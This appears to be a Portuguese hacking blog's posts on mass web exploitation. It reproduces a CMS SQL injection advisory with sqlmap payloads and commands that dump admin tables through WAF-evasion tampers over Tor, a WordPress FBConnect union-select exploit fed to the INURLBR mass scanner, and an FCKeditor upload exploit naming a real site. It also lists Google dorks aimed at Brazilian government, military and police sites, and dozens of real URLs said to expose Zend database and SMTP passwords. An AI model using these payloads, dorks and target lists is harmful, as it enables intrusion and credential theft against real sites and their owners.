Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador dork. Mostrar todas as postagens
Mostrando postagens com marcador dork. Mostrar todas as postagens

quarta-feira, 13 de maio de 2015

Web India Solutions CMS 2015 - SQL Injection Vulnerability

VULNERABILIDADE SQLI EM CMS INDIANO  Web India Solutions CMS 2015


Our Website Designing and Development services include Website redesigning, creation of Responsive Websites, Website content updates,  E-commerce Website designing etc. You can contact us for all the website related services. We use HTML5, CSS3, JavaScript, Ajax, PHP,  WordPress and Joomla for Development and Content Management.  (Copy of the Vendor Homepage: http://www.webindiasolutions.com/ )
[ + ] References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1495

[ + ] Release Date:
2015-05-13
[ + ] Vulnerability Laboratory ID (VL-ID):
1495
[ + ] Common Vulnerability Scoring System:
8.3
[ + ] Product & Service Introduction:
Our Website Designing and Development services include Website redesigning, creation of Responsive Websites, Website content updates, 
E-commerce Website designing etc. You can contact us for all the website related services. We use HTML5, CSS3, JavaScript, Ajax, PHP, 
WordPress and Joomla for Development and Content Management.

(Copy of the Vendor Homepage: http://www.webindiasolutions.com/ )


[ + ] Abstract Advisory Information:
An independent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official CMS Web India Solutions (2015 Q2).

[ + ] Vulnerability Disclosure Timeline:
2015-05-13: Public Disclosure (Vulnerability Laboratory)

[ + ] Discovery Status:
Published

[ + ] Affected Product(s):
Web India Solutions
Product: Content Management System 2015 Q2

[ + ] Exploitation Technique:
Remote

[ + ] Severity Level:
High

[ + ] Technical Details & Description:
Multiple remote sql injection vulnerabilities has been discovered in the official Content Management System Web India Solutions (2015 Q2).
The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or database management system.

The vulnerabilities are located in the id value of the `departments.php`,`offers.php` and `photogallery_view.php` files. Remote attackers are 
able to execute own sql commands by manipulation of the GET method request with the vulnerable id value. The request method to inject the 
command is GET and the issue is located on the application-side.

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.3.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):   GET
Vulnerable File(s):  departments.php, offers.php, photogallery_view.php
Vulnerable Parameter(s): id

[ + ] Proof of Concept (PoC):
The remote sql injection web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.

[ + ] Dork(s):
intext:"Website Development Web India Solutions" +inurl:.php?id=  
intext:"Web India Solutions" & inurl:"php?id="
intext:"Website Development Web India Solutions" +inurl:.php?id=   intext:"Web India Solutions" & inurl:"php?id="
[ + ] PoC: Payload(s):
https://www.[SITE].com/anyinfectedfile.php?id=(ID)+XPL

[ + ] SQLMAP Payload(s):
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=34' AND 4678=4678#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=34' AND (SELECT * FROM (SELECT(SLEEP(5)))mQsU)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-4358' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a766a71,0x674c4e4756745179796a,0x7178767871),NULL,NULL,NULL,NULL#

[ + ] COMMAND(s) SQLMAP:
sqlmap -u http://www.site.com/filevuln.php?id=(ID)--dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) -D [DB_NAME] --tables --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast

sqlmap -u http://www.site.com/filevuln.php?id=(ID) --dump -D [DB_NAME] -T cms_admin --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast

- OUTPUT PRINT SQLMAP:    
sqlmap -u http://www.site.com/filevuln.php?id=(ID)--dbs --tamper modsecurityzeroversioned.py --level 3 --risk 2 --random-agent --no-cast  sqlmap -u http://www.site.com/filevuln.php?id=(ID) -D [DB_NAME] --tables --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast  sqlmap -u http://www.site.com/filevuln.php?id=(ID) --dump -D [DB_NAME] -T cms_admin --tamper modsecurityzeroversioned.py,space2morehash.py  --level 3 --risk 2 --random-agent --no-cast


[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Web India Solutions" & inurl:"php?id="' -s sqli.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch --tamper modsecurityzeroversioned.py"

- OUTPUT PRINT INURLBR: 
[+] EXPLORING WITH MASS INURLBR: php inurlbr.php --dork 'intext:"Web India Solutions" & inurl:"php?id="' -s sqli.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch --tamper modsecurityzeroversioned.py" OUTPUT PRINT SQLMAP:


[+] DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


[ + ] REF FONTE:
http://www.vulnerability-lab.com/get_content.php?id=1495

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS:  Fbconnect [ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 
---------------------------------------------------------------------------

[ + OUTPUT VULN
-s sqli.txt  
---------------------------------------------------------------------------

[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 
---------------------------------------------------------------------------

[ + EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------

[ + TYPE INTERNAL VALIDATION
-t 2 
---------------------------------------------------------------------------

[ + SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 
---------------------------------------------------------------------------

[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

segunda-feira, 19 de janeiro de 2015

wp-backup-plus: Wordpress Database File Download filter with inurlbr

Wordpress File Download Database 

The WP Backup Plus Plugin:
The Full Automated Wordpress Backup Plugin that sends your backup to multiple locations that allows you to backup, restore, automate, and clone.

DORK: index of "wp-backup-plus"

(Priv8) method for using the downloaded file to deface the server and how to find the script file download in WordPress sites can be explored in all wordpress versions.

[TUTORIAL]

Using inurlbr scanner to filter

COMMAND INURLBR:
php inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

[RESULT SHORT]
Using inurlbr scanner to explore  COMMAND INURLBR: inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

DOWNLOAD THE TOOL INURLBR: 
https://github.com/googleinurl/SCANNER-INURLBR

segunda-feira, 15 de setembro de 2014

Exploit HTMLEditor e dorks upload de arquivos

Explorando HTMLEditor 

Explorando HTMLEditor


DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"


http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Mude o conectar para PHP ele vai efetuar o upload.

Mude o conectar para PHP ele vai efetuar o upload.

Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.

O arquivo upado pode ser encontrado em:


http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
 or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO

Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg


Exemplo de uso SCANNER INURLBR

COMANDO=>{

./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a 'FCKeditor - Uploaders Tests'

}

Resultado:


Exemplo de uso SCANNER INURLBR


quarta-feira, 27 de agosto de 2014

FBI alerta sobre pesquisas avançadas no Google

FBI alerta sobre pesquisas avançadas no Google

Google Hacking sinalizado como potencial risco


Um boletim emitido pelo Departamento de Segurança Interna, o FBI e o Centro Nacional de Contraterrorismo no início deste mês avisa policiais e agentes de segurança privada que os cibernéticos maliciosos podem usar "técnicas avançadas de busca" para descobrir informações confidenciais e outras vulnerabilidades em websites. O boletim, intitulado "Malicious Cyber Actors Use Advanced Search Techniques ", descreve um conjunto de técnicas colectivamente referidos como "Google dorking" ou "Google hacking" que usam "operadores avançados" para refinar buscas para fornecer resultados mais específicos. Listas de estes operadores são fornecidos pelo Google.

RECURSO EM DESTAQUE 

Apresentado por Riverbed Technology 

10 Problemas comuns APM ajuda você a resolver
Conselhos práticos para que você possa tirar o máximo proveito dos benefícios da APM e manter seu ambiente de TI.
O memorando é bastante simples, mas o conteúdo sai como algo que faz pensar por que é necessário tal advertência em primeiro lugar. Isto é, até você começar a procurar os documentos no espaço de domínio do governo. Então, tudo faz sentido.
Ele passa a referenciar de várias flags que podem ser usados ​​no Google para encontrar informações, incluindo o tipo de arquivo, local, URL, e em operadores de texto. Google faz uma lista completa de operadores válidos que é disponível online.

OPERADORES ONLINE=>
https://sites.google.com/site/gwebsearcheducation/advanced-operators

É um exemplo, a nota destaca um incidente em 2011, onde os atacantes utilizado Google Hacking para descobrir números de segurança social em um servidor FTP Yale University. Outro incidente apontados no memorando centrou-se nas 35 mil sites que foram comprometidos após atacantes usaram o Google para localizar instalações vBulletin vulneráveis.

Uma rápida pesquisa no Google mostra que a nota não faz um ponto válido, como muitos dos sites indexados no espaço do governo oferecem uma variedade de documentos disponíveis para consumo público.

No entanto, do ponto de vista de um atacante, os formulários e documentos internos -, bem como os detalhes de contato sobre alguns deles - oferecem uma maneira de falsa legitimidade durante um ataque direcionado. Muitos dos documentos têm um contexto interno, algo que pode ser aproveitada pelos atacantes, a fim de arranjar algo para abrir um anexo, além disso, os próprios documentos contêm metadados.

Acessando esses documentos em uma ferramenta como o FOCA (Fingerprinting Organizations with Collected Archives), revela detalhes adicionais, tais como autor, endereços de email, convenções de nomeação de rede (incluindo os compartilhamentos de rede), caminhos do sistema (útil para o mapeamento de uma rede ou sistema), títulos de software e números de versão, endereços IP e dados do sistema operacional.

FOCA (Fingerprinting Organizations with Collected Archives)=>         https://www.elevenpaths.com/labstools/foca/index.html

A pesquisa abaixo oferece um exemplo do que o memorando está falando, mas ele terá de ser ajustado a fim de descobrir alguns dos documentos sensíveis. Além disso, as listas prontamente disponíveis de operadores para pesquisa de vulnerabilidades em sites podem ser encontrados por toda a Web, como a lista.

DORK=>
filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"

LISTA=>
http://pastebin.com/6tghmhzh

O memorando recomenda que administradores de sites usam robots.txt para evitar diretórios com informações confidenciais sejam indexados, e incentivou o uso do Google Hacking para descobrir os arquivos que já estão no domínio público. De lá, eles podem ser removidos do Google, seguindo as diretrizes do gigante das buscas.

DORK=> Confidential filetype:xls site:.gov
DORK=> Confidential filetype:xls site:.gov



DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"
DORK=> filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:.mil.br "FOUO" | "NOFORN" | "Confidential" | "SECRETO" | "CONFIDENCIAL"



Lista simples de operadores.
allintext: / intext:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no texto da página

allintitle: / intitle:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar no título

allinurl: / inurl:       Resultados se restringe a aqueles que contêm todos os termos da consulta que você especificar na URL

filetype:suffix      Resultados limites para páginas,arquivos cujos nomes terminam em sufixo

site:                      Usando o operador site: restringe os resultados da pesquisa para o site ou domínio que você especificar

sinal negativo  ( – )   excluir Colocar um sinal de menos imediatamente antes de uma palavra indica que você não quer que as páginas que contêm esta palavra a aparecer em seus resultados

Pesquisa de frase (o uso de aspas duplas, “…” ) Ao colocar aspas em torno de um conjunto de palavras, você está dizendo Google para considerar as palavras exatas em que ordem exata, sem qualquer alteração

Documento=> Malicious Cyber Actors Use Advanced Search Techniques
Documento=> Malicious Cyber Actors Use Advanced Search Techniques

FONTE: http://www.csoonline.com/article/2597556/social-engineering/fbi-issues-warning-about-creative-google-searches.html 

segunda-feira, 28 de julho de 2014

Dorks variadas voltadas pra sqlinjection.

Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
Dorks variadas voltadas pra sqlinjection.


site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
site:.ar inurl:fbconnect_action= fbuserid= intext:User
site:.ar inurl:fbconnect_action= fbuserid=
inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=)
inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php  inurl:pageid?
inurl:.policiacivil.sp.gov.br modules
site:sp.gov.br "Warning:" ext:php

quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/

sexta-feira, 20 de junho de 2014

DORK encontra erros non-object

Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.

